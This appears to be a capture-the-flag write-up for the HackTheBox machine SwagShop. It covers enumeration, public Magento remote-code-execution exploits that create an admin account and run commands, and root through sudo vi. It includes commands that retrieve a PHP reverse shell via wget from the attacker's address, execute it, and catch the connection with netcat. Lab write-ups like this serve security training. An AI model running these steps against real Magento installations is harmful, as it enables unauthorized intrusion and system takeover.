- Vulnerability: Remote code execution via Magento
- Explanation: Magento has couple remote code execution vulnerabilities allowing admin account creation and then code execution through admin account
- Vulnerability: sudo vi capability
- Explanation: shell can be obtained through vi
nmap -p- -A -T4 10.10.10.140
TCP 22: OpenSSH 7.2p2 Ubuntu TCP 80: Apache 2.4.18
Initial Shell Exploitation
Only port 22 & 80 are open. Let’s check out the webpage
Browsing around the website and trying out some injections didn’t lead to anything particularly interesting. But notice the url looks interesting when browsing the login page
The url shows some path parameter like syntax after index.php. So I decide to do directory search using gobuster on both / & /index.php
gobuster dir -u http://10.10.10.140:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307" -x "txt,html,php"
A few files and folders are found. Browsing through them I am able to find a folder (/var/package/) of interests that could suggest the version of Magento is v1.9
Now check the results of gobuster searching on /index.php:
gobuster dir -u http://10.10.10.140:80/index.php -w /usr/ share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403"
Results show an interesting path /index.php/admin. Navigate to the path reveals it as the admin login page.
Tried some weak password guesses without success. Next is to check if Magento has any vulnerabilities
A quick run on the exploit shows the script has syntax error. It is due to comments that are not in the right format. So remove them all (some at the beginning and some at the end) first. Next set the target variable to “http://10.10.10.140” and run again
Still not working. Look at the script and it use the url /admin/Cms_Wysiwyg/directive/index/. Navigator to this url on browser shows that the url is not valid.
Remember we found the admin login page at /index.php/admin but not /admin. So I changed the target to “http://10.10.10.140/index.php” instead and try again
All right! Exploit works now. Let’s try to login as admin using credentials: forme:forme
When doing searchsploit, there’s another Remote code execution vulnerability but requires authentication. Now that we have admin login, we can try that exploit.
Check out the script shows that we need to modify some configurations in the script. So make changes as follow:
#Config. username = 'forme' password = 'forme' php_function = 'system' # Note: we can only pass 1 argument to the function install_date = b'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
Now run the exploit. Note: the exploit requires module mechanize. You can install it using command pip install mechanize.
After checking out the script, it tries to add form new manually but is not required. So remove the following line:
Now run the script again and I get another error:
This error occurs when the script tries to search on content but failed to find expected info. Let’s modify the script and print out to see what content has returned.
Run the script again to see the content
It shows that No Data Found. It’s the same we see at admin page. Seems like they are related.
I play with the range and change it. All resulted in No Data Found until I try Range using 2YTD. It shows a word chart instead.
I use this hint to change script from 7d to 2y.
Run script again
Finally get the exploit working. Awesome!
IMPORTANT: The exploit requires a valid transaction within the specified time frame. If there’s no transaction returned, the exploit will fail. If you encounter No Data Found even when using 2YTD, that means the transaction (originally created in the box) is too old. You have to create a new transaction by creating a user account, make a purchase and then create an invoice for the order at the admin panel.
I tried some simple reverse shell but all didn’t work. So I decide to upload a php reverse shell and then run it. Let’s first prepare the reverse shell to connect back to 10.10.14.48:4000
cat /usr/share/webshells/php/php-reverse-shell.php | sed "s/127.0.0.1/10.10.14.48/g" | sed "s/1234/4000/g" > shell4000.php
Now setup a simple http server: python -m SimpleHTTPServer 80 and use netcat to listen to port 4000: nc -nvlp 4000. Finally run the exploit again:
python3 37811.py http://10.10.10.140/index.php/admin "wget http://10.10.14.48/shell4000.php -O /tmp/shell4000.php" python3 37811.py http://10.10.10.140/index.php/admin "php -f /tmp/shell4000.php"
Initial shell obtained!
We can perform sudo vi and inside vi we can run a shell using command :sh
sudo vi /var/www/html/api.php
Rooted!! Now we can capture the root flag.
Thank you for the box SwagShop, ch4p!